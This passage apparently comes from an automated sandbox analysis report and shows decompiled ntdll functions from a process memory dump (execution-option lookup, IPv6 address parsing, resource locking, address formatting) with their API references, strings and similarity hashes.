							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E025C3F92();
					_t38 = 1;
					L2:
					return E0257E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x025a7f08
0x025a7f0f
0x025a7f12
0x025a7f1b
0x025a7f31
0x025c3ead
0x025c3eb4
0x00000000
0x00000000
0x025c3eba
0x025c3ecd
0x025c3ed2
0x025c3ee1
0x025c3ee7
0x025c3eec
0x025c3f12
0x025c3f18
0x025c3f1a
0x00000000
0x00000000
0x025c3f20
0x025c3f26
0x025c3f28
0x00000000
0x00000000
0x025c3f2e
0x025c3f30
0x00000000
0x00000000
0x025c3f3a
0x025c3f3b
0x025c3f53
0x025c3f64
0x025c3f69
0x025c3f6c
0x025c3f6d
0x025c3f6f
0x025ce304
0x025ce30f
0x025ce315
0x025ce31e
0x025ce321
0x025ce327
0x025ce329
0x00000000
0x00000000
0x00000000
0x00000000
0x025ce32f
0x025ce32f
0x025ce337
0x025ce33a
0x025ce33b
0x025ce33d
0x025ce33f
0x025ce341
0x025ce341
0x025ce34e
0x025ce353
0x025ce358
0x025ce35d
0x025ce35f
0x00000000
0x00000000
0x025ce365
0x025ce365
0x025ce368
0x025ce36e
0x00000000
0x00000000
0x025ce374
0x025ce32f
0x025c3f75
0x025c3f7a
0x025c3f7c
0x025c3f7e
0x025c3f86
0x025a7f39
0x025a7f47
0x025a7f47
0x025a7f37
0x025a7f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 025C3F12

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 025C3F4A
ExecuteOptions, xrefs: 025C3F04
Execute=1, xrefs: 025C3F5E
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 025C3EC4
CLIENT(ntdll): Processing section info %ws..., xrefs: 025CE345
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 025CE2FB
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 025C3F75

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: c8648bcda09ab7e5c3119a4728bfbf58996a9dcdfb24768a0219ea12f54a9e47
Instruction ID: e9bdcb771a9aa26e1b3338b75ce99953e182343969bdf3c9d63de9c26d1cda99
Opcode Fuzzy Hash: c8648bcda09ab7e5c3119a4728bfbf58996a9dcdfb24768a0219ea12f54a9e47
Instruction Fuzzy Hash: DA41D77168031D7AEB20DA94DCD6FDEB3BDBF58714F1004A9A505E6080FB70AB458FA9

Uniqueness

Uniqueness Score: -1.00%

Function 025B0B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E025B0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E02588980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0257DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E025B0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E025B0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E025B06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E025B06BA(_t135, _t178) == 0 || E025B0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E025B0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E025B0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E025B06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E025B06BA(_t124, _t142) == 0 || E025B0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x025b0b21
0x025b0b24
0x025b0b27
0x025b0b2a
0x025b0b2d
0x025b0b30
0x025b0b33
0x025b0b36
0x025b0b39
0x025b0b3e
0x025b0c65
0x025b0c68
0x025b0c6a
0x025b0c6f
0x025deb42
0x00000000
0x00000000
0x025deb48
0x025deb48
0x025b0c75
0x025b0c7a
0x025deb54
0x00000000
0x00000000
0x00000000
0x025deb5a
0x025b0c80
0x025b0c84
0x025deb98
0x00000000
0x00000000
0x025deba6
0x025b0cb8
0x025b0cba
0x025b0cd3
0x025b0cda
0x025b0ce4
0x025b0ce9
0x00000000
0x025b0cec
0x025b0c8c
0x025deb63
0x00000000
0x00000000
0x025deb70
0x025deb75
0x025deb7d
0x00000000
0x00000000
0x025deb8c
0x00000000
0x025deb8c
0x025b0c96
0x00000000
0x00000000
0x025b0ca2
0x025b0cac
0x025b0cb4
0x00000000
0x00000000
0x025b0b44
0x025b0b47
0x025b0b49
0x00000000
0x00000000
0x025b0b4f
0x025b0b50
0x00000000
0x00000000
0x025b0b56
0x025b0b62
0x025b0b7c
0x025b0bac
0x025b0a0f
0x025deaaa
0x00000000
0x025deac4
0x025deac4
0x025b0bd0
0x025b0bd0
0x025b0bd4
0x025b0bd9
0x00000000
0x00000000
0x025b0bdb
0x025b0be0
0x025deb0e
0x025b0a1a
0x00000000
0x025b0a1a
0x025deb1a
0x025deb1f
0x025deb27
0x00000000
0x00000000
0x025deb36
0x00000000
0x025deb36
0x025b0bea
0x00000000
0x00000000
0x025b0bf6
0x025b0c00
0x025b0c03
0x025b0c0b
0x00000000
0x025b0c0b
0x025deaaa
0x00000000
0x025b0a15
0x025b0bb6
0x00000000
0x025b0bc6
0x025b0bc6
0x025b0bcb
0x025b0c15
0x00000000
0x00000000
0x025b0c1d
0x025b0c20
0x025b0c21
0x025b0c24
0x025b0c24
0x025b0c26
0x00000000
0x025b0c26
0x025b0bcd
0x00000000
0x025b0bcd
0x025b0b89
0x025b0b89
0x025b0b90
0x00000000
0x00000000
0x025b0b96
0x00000000
0x025b0b96
0x025b0a04
0x025b0a04
0x025b0b9a
0x025b0b9a
0x025b0b9b
0x025b0b9f
0x00000000
0x00000000
0x00000000
0x025b0ba5
0x025b0ac7
0x025b0aca
0x025deacf
0x00000000
0x025deade
0x025deade
0x025deae3
0x00000000
0x00000000
0x025deaf3
0x025deaf6
0x025deaf7
0x025deafe
0x025deb01
0x00000000
0x025deb01
0x025deacf
0x025b0ad0
0x025b0ad4
0x00000000
0x00000000
0x025b0ada
0x025b0ae6
0x025b0c34
0x00000000
0x025b0c47
0x025b0c49
0x025b0c4a
0x025b0c4e
0x025b0c51
0x025b0c54
0x025b0c57
0x025b0c5a
0x00000000
0x00000000
0x00000000
0x025b0c60
0x025b0afb
0x025b0afe
0x025b0b02
0x025b0b05
0x025b0b08
0x00000000
0x025b0b08
0x025b0ae6
0x025b0b44
0x025b09f8
0x025b09f8
0x025b09f9
0x00000000
0x00000000
0x025deaa0
0x00000000

APIs

__fassign.LIBCMT ref: 025B0BF6
__fassign.LIBCMT ref: 025B0CA2

Strings

., xrefs: 025B0A0C
:, xrefs: 025B0BA9
:, xrefs: 025B0AC7

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: 92dea25a0bcc65a3efc9edfbe3afaadfa879950208f8e05e18e81db2280eaa76
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 5AA1AE7190020ADEDF26CF64C8457FFBBB9BF45309F2488AAD442A72C0D7309A45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 025B0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E025B0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026501c0;
									_push(_t144);
									_push(0);
									_t51 = E0256F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E025B4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E025C3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E025C3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E025F217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E025C3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E025B3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026501c0;
												_push(_t138);
												_push(0);
												_t58 = E0256F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E025B4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E025C3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E025C3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E025F217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E025C3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E025B3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02595384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0256F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E025B3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0256F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E025B3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0256F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E025B3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E02595329(_t110, _t138);
																return E025953A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}

0x025b055a
0x025b055d
0x025b0563
0x025b0566
0x025b05d8
0x025b05e2
0x025b05e5
0x00000000
0x025b05e7
0x025b05e7
0x025b05ea
0x025b05f3
0x025b05f3
0x025b0568
0x025b0568
0x025b0568
0x025b0569
0x025b0569
0x025b0569
0x025b056b
0x00000000
0x00000000
0x025d217f
0x025d2183
0x025d225b
0x025d225f
0x025d2189
0x025d218c
0x025d218f
0x025d2194
0x025d2199
0x025d219d
0x025d21a0
0x025d21a2
0x025d21ce
0x025d21ce
0x025d21ce
0x025d21d0
0x025d21d6
0x025d21de
0x025d21e2
0x025d21e8
0x025d21e9
0x025d21ec
0x025d21f1
0x025d21f6
0x00000000
0x00000000
0x025d21f8
0x025d21fb
0x025d2206
0x025d220b
0x025d220c
0x025d2217
0x025d2226
0x025d222b
0x025d222c
0x025d222f
0x025d2232
0x025d2235
0x025d2235
0x025d223a
0x025d223f
0x025d2241
0x025d2243
0x025d2248
0x025d2248
0x025d224d
0x025d224f
0x025d2262
0x025d2263
0x025d2268
0x025d2269
0x025d2269
0x025d2269
0x025d226d
0x00000000
0x00000000
0x025d2276
0x025d2279
0x025d227e
0x025d2283
0x025d2287
0x025d228a
0x025d228d
0x025d228f
0x025d22bc
0x025d22bc
0x025d22bc
0x025d22be
0x025d22c4
0x025d22cc
0x025d22d0
0x025d22d6
0x025d22d7
0x025d22da
0x025d22df
0x025d22e4
0x00000000
0x00000000
0x025d22e6
0x025d22e9
0x025d22f4
0x025d22f9
0x025d22fa
0x025d2305
0x025d2314
0x025d2319
0x025d231a
0x025d231d
0x025d2320
0x025d2323
0x025d2323
0x025d2328
0x025d232d
0x025d232f
0x025d2331
0x025d2336
0x025d2336
0x025d233b
0x025d233d
0x025d2350
0x025d2351
0x025d2356
0x025d2359
0x025d2359
0x025d235b
0x025d235d
0x02595367
0x0259536b
0x02595372
0x00000000
0x00000000
0x00000000
0x00000000
0x025d2363
0x025d2363
0x025d2369
0x025d236a
0x025d236c
0x025d2371
0x025d2373
0x00000000
0x025d2379
0x025d2379
0x025d237a
0x025d237f
0x025d237f
0x025d2385
0x025d2386
0x025d2389
0x025d238e
0x025d2390
0x02595378
0x0259537c
0x025d2396
0x025d2396
0x025d2397
0x025d239c
0x025d23a2
0x025d23a3
0x025d23a6
0x025d23ab
0x025d23ad
0x00000000
0x025d23b3
0x025d23b3
0x025d23b4
0x025d23b9
0x025d23ba
0x025d23ba
0x025d23bc
0x025d23bf
0x00000000
0x00000000
0x025c9153
0x025c9158
0x025c915a
0x025c915e
0x025c9160
0x00000000
0x025c9166
0x025c9166
0x025c9171
0x025c9176
0x025c9176
0x00000000
0x025c9160
0x025d23c6
0x025d23d7
0x025d23d7
0x025d23ad
0x025d2390
0x025d2373
0x025d233f
0x025d233f
0x00000000
0x025d233f
0x025d2291
0x025d2291
0x025d2293
0x025d2295
0x025d229a
0x025d22a1
0x025d22a3
0x025d22a7
0x025d22a9
0x00000000
0x00000000
0x025d22ab
0x025d22ad
0x025d22af
0x00000000
0x00000000
0x00000000
0x025d22af
0x025d22b1
0x025d22b4
0x025d22b4
0x025d22b6
0x025953be
0x025953be
0x025953be
0x025953c0
0x00000000
0x00000000
0x025953cb
0x025953ce
0x025953d0
0x025953d4
0x025953d6
0x00000000
0x025953d8
0x025953e3
0x025953ea
0x025953ea
0x00000000
0x025953d6
0x00000000
0x00000000
0x00000000
0x00000000
0x025d22b6
0x00000000
0x025d228f
0x025d2349
0x025d234d
0x025d2251
0x025d2251
0x00000000
0x025d2251
0x025d21a4
0x025d21a4
0x025d21a6
0x025d21a8
0x025d21ac
0x025d21b6
0x025d21b8
0x025d21bc
0x025d21be
0x00000000
0x00000000
0x025d21c0
0x025d21c2
0x025d21c4
0x00000000
0x00000000
0x00000000
0x025d21c4
0x025d21c6
0x025d21c6
0x025d21c8
0x00000000
0x00000000
0x00000000
0x00000000
0x025d21c8
0x025d21a2
0x00000000
0x025d2183
0x025b057b
0x025b057d
0x025b0581
0x025b0583
0x025d2178
0x00000000
0x025b0589
0x025b058f
0x025b058f
0x025b0583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025D2206

Strings

RTL: Resource at %p, xrefs: 025D221D, 025D230B
RTL: Re-Waiting, xrefs: 025D223A, 025D2328
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 025D220E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 025D22FC

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: c6ebdc20c3847f87237a6a7e802a079410bf0faa554aa33d5462d23e6c7cb8c4
Instruction ID: b299a4d8367c8711f8d2fad8457fb025b8f233f0ac498a184e01378716182d38
Opcode Fuzzy Hash: c6ebdc20c3847f87237a6a7e802a079410bf0faa554aa33d5462d23e6c7cb8c4
Instruction Fuzzy Hash: 7C5141717002126FEB25CE5CDC81FA677AABFC4720F218259FD55DB285E631DC418B98

Uniqueness

Uniqueness Score: -1.00%

Function 025B14C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E025B14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2652088; // 0x77690715
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E025A7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E025B13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E025A7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E025A7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E02572340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0257E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x025b14c0
0x025b14cb
0x025b14d2
0x025b14d6
0x025b14da
0x025b14de
0x025b14e3
0x025b157a
0x025b157a
0x025b14f1
0x025b14f3
0x025dea0f
0x00000000
0x025dea15
0x00000000
0x025dea15
